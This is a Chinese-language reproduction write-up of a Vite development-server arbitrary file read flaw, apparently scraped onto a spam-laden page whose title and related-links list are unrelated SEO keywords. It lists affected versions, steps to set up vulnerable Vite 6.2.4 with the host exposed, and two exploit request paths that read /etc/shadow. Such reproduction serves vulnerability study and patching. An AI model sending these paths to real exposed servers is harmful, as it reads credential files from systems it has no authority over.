当前位置: 首页 > wzjs >正文

沈阳定制网站制作广告公司品牌营销推广

wzjs 2025/7/26 9:36:24
沈阳定制网站制作,广告公司品牌营销推广,做塑胶原料用什么网站好,企业宣传文案模板漏洞描述 该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。 利用条件:仅在 Vite 启动时使用了 --host 或配置…

漏洞描述

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。

利用条件:仅在 Vite 启动时使用了 --host 或配置文件设置了 server.host 导致对外网暴露的开发环境中才会受影响。

影响版本

  • 6.2.0 <= Vite <= 6.2.4
  • 6.1.0 <= Vite <= 6.1.3
  • 6.0.0 <= Vite <= 6.0.13
  • 5.0.0 <= Vite <= 5.4.16
  • Vite <= 4.5.11

环境搭建

这里使用漏洞次新版:vite 6.2.4

1. 安装node 和 npm

# 添加 NodeSource 仓库(安装 18.x 或 20.x 都可以)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 安装 node 和 npm
sudo apt install -y nodejs
# 验证安装
node -v
npm -v

2. 创建项目,按照如下所示操作

npm create vite@latest
  • 项目名回车默认:vite-project
  • 选择框架 Vanilla
  • 选择 JavaScript

3. 项目生成好后,接下来运行项目

cd vite-project
#手动降级vite到 6.2.4 版本
npm install vite@6.2.4 --save-dev
#查看版本
npx vite -v

4. 新建 vite.config.js

// vite.config.js
export default {server: {host: true}
}

5. 最后运行

npm install
npm run dev

漏洞复现

/etc/shadow?.svg?.wasm?init
#或者
/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw

参考:https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x

http://www.dtcms.com/wzjs/98922.html

相关文章:

  • 有网站用nodejs做后台如何拿高权重网站外链进行互换?
  • cms+wordpress模板seo技术有哪些
  • 毕业网站设计代做软文广告经典案例100字
  • 网站建设首页模板seo都用在哪些网站
  • 商业门户网站有哪些清远今日头条新闻
  • 网站建设价格优惠网络推广网站电话
  • 购物网站建设it培训机构哪个好
  • 建立化妆品网站功能免费网络推广平台有哪些
  • 如何做logo模板下载网站网站做优化一开始怎么做
  • 网站全屏banner轮播图电脑全自动挂机赚钱
  • seo优化网站排名百度趋势搜索
  • 做火影网站背景图精准营销的成功案例
  • ip会变怎么做网站网站免费推广
  • 湖南美食网站建设策划书网站seo收费
  • 江西个人网站备案实体店营销方案
  • 客户网站建设完成后需要什么百度下载安装到桌面上
  • 南阳网站制作怎么样搜索引擎提交入口网址
  • 简述网站开发流程seo优化公司如何做
  • 卫生院网站建设qq群推广链接
  • 路由器设置济南seo优化公司助力网站腾飞
  • it行业怎么入门宁波网站优化公司哪家好
  • 网站上面的水印怎么做市场推广是做什么的
  • 萧山建设有限公司网站综合搜索引擎
  • 达建网站防止爬虫的办法营销推广方案案例
  • 明年做那些网站致富站长之家查询
  • wordpress导入产品无锡百度seo优化
  • 怎样维护公司网站网络营销策划书案例
  • 一起做彩票网站的人免费的自助建站
  • 无做弊的棋牌游戏网站随州今日头条新闻
  • 宝鸡网站建设软文代发价格